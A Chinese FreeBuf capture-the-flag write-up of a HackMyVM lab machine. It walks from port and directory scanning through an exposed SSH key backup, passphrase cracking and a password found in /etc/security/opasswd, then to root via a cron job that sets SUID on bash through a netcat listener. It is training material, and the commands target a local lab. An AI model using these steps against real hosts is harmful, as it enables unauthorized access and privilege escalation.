官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
知非- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
本文由
知非 创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
前言
本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!
信息收集阶段
靶机:192.168.1.128
Kali攻击机:未知
目标:user权限和root权限
nmap -sn 192.168.1.0/24
nmap -A -p1-65535 192.168.1.3
开启了22端口和80端口:
访问下80端口:
漏洞利用阶段
显示网站在维护,请下个月再来!
查看网站源代码:啥也没有!
目录扫描走起:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.1.3/ -x txt,php,html,log,zip,bak
发现了这个可疑的文件,打开看看!
http://192.168.1.3/staff_statements.txt
The site is not yet repaired. Technicians are working on it by connecting with old ssh connection files.
网站没有修改,技术人员通过连接旧的SSH连接文件进行连接,并且在其上工作。
旧的SSH连接文件?在哪?
SSH的连接文件是id_rsa,旧的就是id_rsa.bak文件!
我们试着访问下这个文件!!!
果然有这个文件,下载下来保存!
用户名呢?在这!
接下来采用用户名和密码进行登录!
下图表明该密钥还需要密码!
接着,我们对这个密码进行破解!
用户名:jack
密钥密码为:bananas
登录下看看:
还有两个用户!并且jack下没有user.txt文件!!
老样子:sudo -l 和 suid权限查询!都不行!
直接上传脚本,linpeas.sh!!!
非常意外,又翻车了!!!并没有找到需要找的东西!!
结合上文内容,我们查找下:
find / -name *passwd* -print
查看下这个文件:
cat /etc/security/opasswd
jack:Il0V3lipt0n1c3t3a
这个有可能是另一个用户的密码!
第一个flag:
cat user.txt
5c38d7****************5cbe99
权限提升阶段
接着就剩下提权到root了!!
SUID走起!!!
find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
没啥可利用的,linpeas.sh脚本没啥用的话,我们换个脚本pspy64脚本!!
发现了一个特别的脚本:
/bin/sh -c nc -vv -q 1 localhost 10000 > /root/.local/out && if [ "$(cat /root/.local/helder.txt)" = "$(cat /home/helder/passwd.txt)" ] ; then chmod +s "/usr/bin/$(cat /root/.local/out)" ; fi
如果文件之间的内容匹配,我们可以发送一个字符串,然后将SUID权限分配给/usr/bin/<string>
在/home/helder执行!
echo "Il0V3lipt0n1c3t3a" > passwd.txt
echo "bash" > root
nc -lnvp 10000 < root
等待连接:
ls -la /usr/bin/bash
已经获得root组权限:
Id:
helder@ripper:~$id
uid=1001(helder) gid=1001(helder) euid=0(root) egid=0(root) groups=0(root),1001(helder)
查看最后的flag:
cat /root/root.txt
e28f57*******************96f9f
已在FreeBuf发表 125 篇文章
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
hackmyvm靶场实战
- 125 文章数
- 40 关注者